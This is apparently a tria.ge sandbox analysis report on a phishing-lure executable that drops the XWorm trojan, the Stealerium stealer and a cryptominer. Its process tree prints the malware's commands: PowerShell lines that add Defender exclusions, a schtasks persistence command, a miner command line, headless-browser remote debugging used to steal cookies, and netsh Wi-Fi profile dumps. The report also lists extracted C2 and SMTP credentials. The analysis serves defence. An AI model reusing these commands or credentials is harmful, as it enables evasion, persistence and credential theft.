Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
14/03/2025, 18:40
General
-
Target
Notice_bill_of_lading_number_HAWB_771434342326.exe
-
Size
1.1MB
-
MD5
14eac5d4385edf42ee4b30a738348c34
-
SHA1
ebdd198f3cc8250d279773cbbd85422c5a2ffdb6
-
SHA256
0638ab8a2a8a1c7d8e7f5b5fd0b267d875a8298a166e929cc85bd69122657800
-
SHA512
f84a52164ea695a674023f2e6717725c3b3692ad14cd69a47f3b217b4ccda04c5048969bbd72a7902d137f8f9d648dfebe8a5e275aa4d9b82ed7bdfd7ef3c7b2
-
SSDEEP
24576:HugHDkJgxyAFQBsGNGHICvMh8RSEAbLvK9EkPHrh1YA00:/HDl13G7CvMh8RSBQHrw
Malware Config
Extracted
Protocol: smtp- Host:
mail.xma0.com - Port:
587 - Username:
[email protected] - Password:
london@1759
Extracted
xworm
5.0
204.10.161.147:7081
XoFHv1TT4hWErxRo
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Stealerium
An open source info stealer written in C# first seen in May 2022.
-
Stealerium family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file 1 IoCs
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 55 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Notice_bill_of_lading_number_HAWB_771434342326.exe"C:\Users\Admin\AppData\Local\Temp\Notice_bill_of_lading_number_HAWB_771434342326.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\wozomp.exe"C:\Users\Admin\AppData\Local\Temp\wozomp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\scvhost\google_update.exe"C:\Users\Admin\AppData\Local\Temp\scvhost\google_update.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\scvhost\google_update.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"7⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"8⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"10⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=4AwT1syE3UwKzrsgogHdyALDN1mmsw1KdccdgBQjKVwENEqhLBVKndHQqdWcTkTYysfbBs6RZRB36FUtdqedCATj9zQSQTT --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=80 --tls --cinit-stealth9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9980dcf8,0x7ffd9980dd04,0x7ffd9980dd105⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1940,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=1932 /prefetch:25⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2120,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=2116 /prefetch:35⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2424,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=2420 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=3084 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=3108 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4100,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=4076 /prefetch:25⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=4556 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5100,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=5096 /prefetch:85⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5384,i,9090723167757625834,4243700662466767473,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --disable-logging --mojo-platform-channel-handle=5380 /prefetch:85⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\findstr.exefindstr All5⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x288,0x7ffd98fff208,0x7ffd98fff214,0x7ffd98fff2205⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2236,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=2228 /prefetch:25⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2288,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=2280 /prefetch:35⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2248,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=2884 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3472,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=3516 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=3524 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4344,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=4340 /prefetch:15⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4524,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=4508 /prefetch:25⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4164,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=4780 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5156,i,8957940990224934476,7152525919811638680,262144 --disable-features=PaintHolding --variations-seed-version --disable-logging --mojo-platform-channel-handle=5148 /prefetch:85⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cc01c784-ec73-4ef3-a150-2fbc3aa4cd8d.bat"4⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9245⤵
- Kills process with taskkill
-
-
C:\Windows\system32\timeout.exetimeout /T 2 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD56124869dd562d987783a76ab06012732
SHA111d363e5d0210e30ab2e46a5781aea8dc773471a
SHA256254dac68a02f27fef747d8b22e9897e0f1ad28e8ee2fa946572ab7cb35702919
SHA512691d4fab8f5b2f10e05cc0b0b6fa6ec40ea088f44125767c00500724998e6fe0975d14f75c37ab5cc832f4315a96b581d8cf150404cf3321c05f86b84147e687
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
280B
MD5049e5a246ed025dee243db0ba8e2984c
SHA115ec2d2b28dcfc17c1cfb5d0c13482d0706f942d
SHA25633071ca42c472861a2fabd0f82f8b03ef0daaa6796b24b83f3df02587e4c3d12
SHA512bc5f6fa6a8cae20ab40eae4552650d75f38ebb158c95288a79d9f332623bb507946513c39d19c00a5aee323df01f0f1a51c54594ef1c293289baf45f4ae2145b
-
Filesize
280B
MD54facd0ff10154cde70c99baa7df81001
SHA165267ea75bcb63edd2905e288d7b96b543708205
SHA256a13534df0cd0a79a3a1b91085a6d575b47d5a9aad7fc6d712fd2616c0e95a23b
SHA512ad8d2b965851c0ddc23e92ae151b3b0b2bcda850c446f4278bdb0754d6b42ead8fc034b394749578a27b33ad7e4ab0633f974dfd4773fbe4d93ae477f00b73f2
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
720B
MD597a2d00af5d6062bc3bc6929d20c96d0
SHA12e3963d9c2b923ae7295d580348243dd4db1e8bc
SHA2567d37aa554cae3570a79d81b938c28b13555009ec7640efdd3d0bd4074de41d1e
SHA5123fbab9781b8fff77df0f812b2bc9b43a8e27b2a0fdb5e76372c2778f05b1736a9a03df04051b4a6b588d2e38a82d87fa8feb1c66d2ace286ff0704009f66f402
-
Filesize
720B
MD5d8d1ac90795253720079c10b0ff5b04b
SHA11e7c2af404d1c561f0f12904e8dca9782cbf33ad
SHA2567f88dae682de533bcf814141ff3cf70e97c880355f08954efcf1ed9d052f023d
SHA5127abd34ad00059e0fa7e1ee3ca3cfa69382ee21ea9fbf047ad55ddda7640fa12b83c90d93c785cd22410058ae7c04ac9ddae67eb8d2a7140264b66f3bdcbc7deb
-
Filesize
7KB
MD54df5ef2462fd7c6e9c17333b43bc110e
SHA1dda6ea575406404e973851991a3f14ba9afcc528
SHA2564b3b6e7d732e265fab807992ad7f5c85f13a78eb0b8cb31505aacfe934844365
SHA5127f06b5b7987458793f891482b8e2a0e51ffa75ed90d6dd2e3c6455357c21bd5c63419b2185a1ebf24e7d4d50de711683be93edbf65affe57793d7288f1344ce6
-
Filesize
6KB
MD5c28d48f3a24d0d88144133a4faeb9548
SHA1f0d34802cdd75a027b652ae404956139786d2bfe
SHA2564dd87b1210f7c597e593a63e8511a53cbbf2f746096e4b0355b7b50659122030
SHA512a1fa13481ce9446024346527317210372713f4b6dad07ad9532ca4d9cd797daeb8e70d4abe23e97bbdad91a59555de421c6a42843271c4c8de7083b4f31c7689
-
Filesize
18KB
MD5def2cc6e7c55f10e3512da43382fd748
SHA19f92aab0f16d81d9db27a3d83cfe77c923d18892
